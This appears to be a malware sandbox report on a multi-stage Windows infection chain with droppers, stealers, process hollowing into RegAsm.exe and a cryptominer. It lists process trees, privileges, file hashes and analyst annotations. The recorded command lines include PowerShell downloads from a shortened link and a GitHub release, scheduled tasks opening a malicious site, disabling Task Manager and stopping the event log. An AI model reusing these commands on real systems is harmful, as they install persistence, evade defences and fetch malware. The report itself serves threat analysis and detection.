Suspicious use of AdjustPrivilegeToken 32 IoCs
Processes (privilege / pid / process):
- SeDebugPrivilege: 3000 powershell.exe, 4984 powershell.exe, 4928 powershell.exe, 4688 Explorers.exe, 4448 stl.exe, 3360 RegAsm.exe, 900 svhosts.exe, 4260 RegAsm.exe, 2832 123.exe, 4232 stl.exe
- SeBackupPrivilege: 4688 Explorers.exe
- SeSecurityPrivilege: 4688 Explorers.exe (4)
- SeShutdownPrivilege and SeCreatePagefilePrivilege: powercfg.exe PIDs 3304, 4360, 2516, 392, 1392, 3292, 3440, 3296 (one of each per PID, 16 entries)
- SeLockMemoryPrivilege: 1680 explorer.exe
The SeShutdown/SeCreatePagefile pairs are what powercfg itself enables to change power settings; the one genuinely unusual entry is SeLockMemoryPrivilege in the hollowed explorer.exe, which XMRig enables to allocate large pages for its RandomX scratchpad.
Suspicious use of WriteProcessMemory 64 IoCs
Processes (source PID / source process → target PID / target process, number of WriteProcessMemory entries):
- 4008 c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe → 1428 axplong.exe (3)
- 1428 axplong.exe → 2828 gold.exe (3)
- 2828 gold.exe → 3360 RegAsm.exe (8)
- 1428 axplong.exe → 4468 NewLatest.exe (3)
- 4468 NewLatest.exe → 2304 Hkbsse.exe (3)
- 1428 axplong.exe → 3096 Installer.exe (2)
- 3096 Installer.exe → 1840 cmd.exe (2)
- 1840 cmd.exe → 3052 schtasks.exe (2)
- 1840 cmd.exe → 4292 schtasks.exe (2)
- 1840 cmd.exe → 3000 powershell.exe (2)
- 1428 axplong.exe → 3384 ldr.exe (3)
- 1840 cmd.exe → 4984 powershell.exe (2)
- 4984 powershell.exe → 2876 cmd.exe (2)
- 1840 cmd.exe → 4928 powershell.exe (2)
- 2876 cmd.exe → 4296 schtasks.exe (2)
- 3384 ldr.exe → 832 Hkbsse.exe (3)
- 2876 cmd.exe → 1300 reg.exe (2)
- 2876 cmd.exe → 4276 schtasks.exe (2)
- 2876 cmd.exe → 4668 schtasks.exe (2)
- 1428 axplong.exe → 3564 alex5555555.exe (3)
- 3564 alex5555555.exe → 2224 RegAsm.exe (3)
- 3564 alex5555555.exe → 4260 RegAsm.exe (8)
Two or three writes occur for every child here, including plain schtasks.exe and reg.exe, so that count is the sandbox's record of ordinary process creation; the eight-write runs into RegAsm.exe are the image and section writes of process hollowing. The list stops at 64 entries, so the later injectors (TpWWMUpe0LEV.exe, O3B6wY7ZkFhh.exe, wfbrmcwrltkl.exe) do not appear in it even though their SetThreadContext events are listed above.
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (tree; [level N] is the nesting depth, and each process is followed by its command line and the signatures it triggered)
-
[level 1] C:\Users\Admin\AppData\Local\Temp\c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
cmdline: "C:\Users\Admin\AppData\Local\Temp\c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
[level 2] C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
cmdline: "C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
[level 3] C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
cmdline: "C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
[level 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[level 4] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 300
- Program crash
-
[level 3] C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
cmdline: "C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
[level 4] C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
cmdline: "C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
- Executes dropped EXE
-
[level 3] C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe
cmdline: "C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
[level 4] C:\Windows\SYSTEM32\cmd.exe
cmdline: cmd /c ins.bat
- Suspicious use of WriteProcessMemory
-
[level 5] C:\Windows\system32\schtasks.exe
cmdline: schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
- Scheduled Task/Job: Scheduled Task
-
[level 5] C:\Windows\system32\schtasks.exe
cmdline: schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
- Scheduled Task/Job: Scheduled Task
-
[level 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmdline: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[level 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmdline: powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
[level 6] C:\Windows\System32\cmd.exe
cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"
- Suspicious use of WriteProcessMemory
-
[level 7] C:\Windows\system32\schtasks.exe
cmdline: schtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
- Scheduled Task/Job: Scheduled Task
-
[level 7] C:\Windows\system32\reg.exe
cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
- Modifies registry key
-
[level 7] C:\Windows\system32\schtasks.exe
cmdline: schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
- Scheduled Task/Job: Scheduled Task
-
[level 7] C:\Windows\system32\schtasks.exe
cmdline: schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
- Scheduled Task/Job: Scheduled Task
-
[level 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmdline: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[level 3] C:\Users\Admin\AppData\Local\Temp\1000108001\ldr.exe
cmdline: "C:\Users\Admin\AppData\Local\Temp\1000108001\ldr.exe"
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
[level 4] C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
cmdline: "C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe"
- Executes dropped EXE
-
[level 5] C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exe
cmdline: "C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
[level 6] C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exe
cmdline: C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exe
- Executes dropped EXE
-
[level 6] C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exe
cmdline: C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exe
- Executes dropped EXE
-
[level 6] C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exe
cmdline: C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exe
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[level 5] C:\Users\Admin\AppData\Local\Temp\1000013001\rig.exe
cmdline: "C:\Users\Admin\AppData\Local\Temp\1000013001\rig.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
[level 6] C:\Windows\system32\powercfg.exe
cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
[level 6] C:\Windows\system32\powercfg.exe
cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
[level 6] C:\Windows\system32\powercfg.exe
cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
[level 6] C:\Windows\system32\powercfg.exe
cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
[level 6] C:\Windows\system32\sc.exe
cmdline: C:\Windows\system32\sc.exe delete "xjuumoinznsp"
- Launches sc.exe
-
[level 6] C:\Windows\system32\sc.exe
cmdline: C:\Windows\system32\sc.exe create "xjuumoinznsp" binpath= "C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe" start= "auto"
- Launches sc.exe
-
[level 6] C:\Windows\system32\sc.exe
cmdline: C:\Windows\system32\sc.exe stop eventlog
- Launches sc.exe
-
[level 6] C:\Windows\system32\sc.exe
cmdline: C:\Windows\system32\sc.exe start "xjuumoinznsp"
- Launches sc.exe
-
[level 3] C:\Users\Admin\AppData\Local\Temp\1000109001\alex5555555.exe
cmdline: "C:\Users\Admin\AppData\Local\Temp\1000109001\alex5555555.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
[level 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
-
[level 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
- Suspicious use of AdjustPrivilegeToken
-
[level 5] C:\Users\Admin\AppData\Roaming\configurationValue\svhosts.exe
cmdline: "C:\Users\Admin\AppData\Roaming\configurationValue\svhosts.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[level 5] C:\Users\Admin\AppData\Roaming\configurationValue\Explorers.exe
cmdline: "C:\Users\Admin\AppData\Roaming\configurationValue\Explorers.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[level 5] C:\Windows\SysWOW64\cmd.exe
cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
-
[level 6] C:\Windows\SysWOW64\choice.exe
cmdline: choice /C Y /N /D Y /T 3
-
[level 4] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3564 -s 320
- Program crash
-
[level 3] C:\Users\Admin\AppData\Local\Temp\1000110001\123.exe
cmdline: "C:\Users\Admin\AppData\Local\Temp\1000110001\123.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
[level 3] C:\Users\Admin\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe
cmdline: "C:\Users\Admin\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
[level 4] C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
-
[level 3] C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe
cmdline: "C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe"
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
[level 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
[level 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2828 -ip 2828
-
[level 1] C:\Windows\SysWOW64\WerFault.exe
cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3564 -ip 3564
-
[level 1] C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
cmdline: C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
- Executes dropped EXE
-
[level 1] C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
cmdline: C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
[level 1] C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe
cmdline: C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
[level 2] C:\Windows\system32\powercfg.exe
cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
[level 2] C:\Windows\system32\powercfg.exe
cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
[level 2] C:\Windows\system32\powercfg.exe
cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
[level 2] C:\Windows\system32\powercfg.exe
cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
[level 2] C:\Windows\explorer.exe
cmdline: explorer.exe
- Suspicious use of AdjustPrivilegeToken
-
[level 1] C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
cmdline: C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
- Executes dropped EXE
-
[level 1] C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
cmdline: C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
[level 1] C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
cmdline: C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
- Executes dropped EXE
-
[level 1] C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
cmdline: C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Downloads
-
C:\ProgramData\mozglue.dll
Filesize: 593KB
MD5: c8fd9be83bc728cc04beffafc2907fe9
SHA1: 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256: ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512: fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
Note: mozglue.dll and nss3.dll (next entry) are Mozilla's own NSS runtime libraries. Stealers fetch them into C:\ProgramData so they can call the NSS API to decrypt Firefox logins and cookies instead of reimplementing the format; the hashes identify a Firefox build, not the malware, so hunt on the drop location and the downloading process rather than on these hashes.
-
C:\ProgramData\nss3.dllFilesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD55e6baeec02c3d93dce26652e7acebc90
SHA1937a7b4a0d42ea56e21a1a00447d899a2aca3c28
SHA256137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0
SHA512461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5399245c624bdba23e32088e6f5d02262
SHA153eb6c0fcc770cae56e545fcc62ce93fe2c22f59
SHA25608adfe9ca80924571b25c7d1e88a2fd6ec65548833be5fff59e9fa599e875fdd
SHA5129eb606e63a178d574a45775ee678adf3d077f807406443b16a32b799f7b60ade9ec351c4ff0503a7db8035423d23bb641c42f670a5ebaa98f6251750cfe04f48
-
C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exeFilesize
511KB
MD52d92c64d986c4640e4cb5bc41cb38821
SHA1bfc8e36ac6e2e8e6d44cfbc421307bbd58036dd5
SHA25631dd0e69fb3a0a0999aa228d766e36033bbf1e482bdb93912705850badfba7b0
SHA5124975350e13824fe78e937fe9cf84f86d6de502e588cf219ba2d73a171b74af4382b6b134033cc4cb590a6068299422834192bc52613161d2ee362b6464caa962
-
C:\Users\Admin\AppData\Local\Temp\1000013001\rig.exeFilesize
2.5MB
MD54691a9fe21f8589b793ea16f0d1749f1
SHA15c297f97142b7dad1c2d0c6223346bf7bcf2ea82
SHA25663733ff3b794ebd7566103c8a37f7de862348ffacf130661f2c544dea8cde904
SHA512ee27d5912e2fb4b045ffd39689162ab2668a79615b2b641a17b6b03c4273070a711f9f29dd847ffff5ae437d9df6102df6e10e898c36d44ec25e64ba1dd83386
-
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exeFilesize
493KB
MD592c01627961859a84ffa633327c5d7f9
SHA15b406c39f81f67e2b2e263137c7059718e4af007
SHA25692373c134cbf9fc4a98ed7c80f244c8655b3852d3a1f1983fc4a7b3a00bf1370
SHA512f31f9d45d7783441866faa0e684412040dd74c2878adfc6e5a874626e291b3e3cae7746cb62e2388d4183e615d9b919178fa409f2e12b3d0cf478c59450d3439
-
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exeFilesize
415KB
MD507101cac5b9477ba636cd8ca7b9932cb
SHA159ea7fd9ae6ded8c1b7240a4bf9399b4eb3849f1
SHA256488385cd54d14790b03fa7c7dc997ebea3f7b2a8499e5927eb437a3791102a77
SHA51202240ff51a74966bc31cfcc901105096eb871f588efaa9be1a829b4ee6f245bd9dca37be7e2946ba6315feea75c3dce5f490847250e62081445cd25b0f406887
-
C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exeFilesize
154KB
MD55f331887bec34f51cca7ea78815621f7
SHA12eb81490dd3a74aca55e45495fa162b31bcb79e7
SHA256d7ab2f309ee99f6545c9e1d86166740047965dd8172aec5f0038753c9ff5e9d8
SHA5127a66c5d043139a3b20814ac65110f8151cf652e3f9d959489781fdaea33e9f53ce9fd1992f1a32bff73380c7d9ef47200d8b924a8adf415e7a93421d62eb054d
-
C:\Users\Admin\AppData\Local\Temp\1000108001\ldr.exeFilesize
415KB
MD5c4aeaafc0507785736e000ff7e823f5e
SHA1b1acdee835f02856985a822fe99921b097ed1519
SHA256b1d5b1e480a5731caacc65609eaf069622f1129965819079aa09bc9d96dadde5
SHA512fbaefbce3232481490bce7b859c6c1bafd87ee6d952a2be9bf7c4ed25fe8fc9aff46c2246e247aa05ce8e405831a5905ca366c5333ede0af48f9a6287479a12d
-
C:\Users\Admin\AppData\Local\Temp\1000109001\alex5555555.exeFilesize
1.7MB
MD5a80a86c701801cbd77cf7406be6d11f0
SHA1ef98a953fae4506e0402de15c1f1d9f0bfb47b01
SHA2562f25790b3368b6afd35007dfe873e90a288cfce9d19758756b71fa6952a675f2
SHA5127e1216bda5c36efcc4146c410cb5717e0e9e8257c25cef2239d631fa6fb15ec953b5155b6c4b4f4f3ff661425d1b6e5b716c21711fc7ddd423e6fc009e363d97
-
C:\Users\Admin\AppData\Local\Temp\1000110001\123.exeFilesize
297KB
MD5cd581d68ed550455444ee6e099c44266
SHA1f131d587578336651fd3e325b82b6c185a4b6429
SHA256a2ebb4bbf2ae4f7755b3ab604996e6c7e570ac8837ca544854ed696a81972505
SHA51233f94920032436cd45906c27cd5b39f47f9519ab5a1a6745bd8a69d81ce729d8e5e425a7538b5f4f6992bd3804e0376085f5da1c28cf9f4d664cabe64036d0b5
-
C:\Users\Admin\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exeFilesize
5.6MB
MD59b297a1485665aef1a926f7cd322c932
SHA17c053b8f3905244558d2c319094ef09985521864
SHA2568c75f8e94486f5bbf461505823f5779f328c5b37f1387c18791e0c21f3fdd576
SHA5122a59bb8d940b9bc73ea112aebd04b3b461924adc29f47ea774bd1de23b638c283a041b202693a184d68ec920f2f56160cfded3b17afae31ee46fd00886d9f61b
-
C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exeFilesize
1.2MB
MD5242214131486132e33ceda794d66ca1f
SHA14ce34fd91f5c9e35b8694007b286635663ef9bf2
SHA256bac402b5749b2da2211db6d2404c1c621ccd0c2e5d492eb6f973b3e2d38dd361
SHA512031e0904d949cec515f2d6f2b5e4b9c0df03637787ff14f20c58e711c54eec77d1f22aa0cf0f6efd65362c1fc0066645d5d005c6a77fe5b169427cdd42555d29
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeFilesize
1.8MB
MD55cce8686e206242b06755e8d3b980097
SHA1e2817338b2d55f57189dc48634613187adca42d5
SHA256c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93
SHA51281c957a13d1667f722856a15c6ec07da3bd1676c72199971579fb1b6b2ba01e2466a35ddb8c7f1b6a4f3621ffd04b8ec2536bffe9e484f690e8c3a7fb1cd79f1
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ins.batFilesize
1KB
MD50be4cbfa51fe5f8010e78553a28f2779
SHA1ae21783c148ae1443fa87a43b9b51cb0ab1a799b
SHA256cc56d197270cdf7c3b5c193ec5b3c63dd87b57b58f90571649f8f0e29a6f1a90
SHA512337a332eecb12cb065a09b3ae01e86802082c576b203ffd1a8270c69172036dc244ecffad1fba3de76d573c77f1315821a563d2a4aed73bfeb9e9bdf6107edfd
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k5t0zjzv.02n.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.batFilesize
568B
MD5e861a08036b9eb5f216deb58e8a7934d
SHA15f12dd049df2f88d95f205a4adc307df78ac16ee
SHA256e8315164849216f4c670c13b008e063da2176efb5d08939caa321e39a33035eb
SHA5127ea2fd3b085bd4b3e27d4dda36e079ec8910173cc2b33ccd06698051eb7d5f2818ed9000761d1fc44e354c06d015feb16e77958dab8a3969a0cee2fd453ca0c9
-
C:\Users\Admin\AppData\Roaming\configurationValue\Explorers.exeFilesize
335KB
MD5894c2e356e72da7a60c2978a258b2081
SHA1d9d57f6bf516c5a381df6d5a81d73314a9a60ffb
SHA2566a76e1042b46a21b225b20eb8d93aac9afd4f028f2fa4c7d09d1f478a67a0352
SHA512c73ddafd2bd0dd582dfb5030460d46b9ba7e9746e169131cc0bafdbda74792bfae2ce6604a9450b28284339915d07569596d1e32b21f1f176445432f8bcbdabf
-
C:\Users\Admin\AppData\Roaming\configurationValue\svhosts.exeFilesize
297KB
MD58a70c2805c58fcca31037c6dd59e5833
SHA1233491efa8aab92ecc929ae138fbfbf06877c992
SHA256605636af0dd1495e8a4cbbf6492e5862a4e7536710b533ef1bf1bc8e2670f9d8
SHA512e2041ea7139f34cc621ea0bc0e312cbf41431cdcf4dc5be0c68445bb90be47935e359b6956fe9819e25077bbe6ce1a72ca7349e3956adda3246100c747725c12
-
C:\Users\Admin\AppData\Roaming\d3d9.dllFilesize
279KB
MD58fa26f1e37d3ff7f736fc93d520bc8ab
SHA1ad532e1cb4a1b3cd82c7a85647f8f6dd99833bb1
SHA2566c47da8fbd12f22d7272fbf223e054bf5093c0922d0e8fb7d6289a5913c2e45d
SHA5128a0b53cbc3a20e2f0fd41c486b1af1fbbcf7f2fed9f7368b672a07f25faaa2568bbdbcf0841233ac8c473a4d1dee099e90bf6098a6fa15e44b8526efdafc1287
-
C:\Windows\Tasks\Hkbsse.jobFilesize
284B
MD56f605bac0ed21bda287bbc84bf77d60c
SHA17db1a952279d02ab916cd4d311125a3966e7b0ec
SHA25629423bbc168c5a54b40fe808a30ec7631a4f4eba3c7c895c5566723ef46d8fff
SHA512210c6abc35f9cb45d4a04f85979608047ac96cad3f4104687ca9d7ae5228160c9d92cf231793bef963bde37048656265356283b54326be0fc064ee533aea211f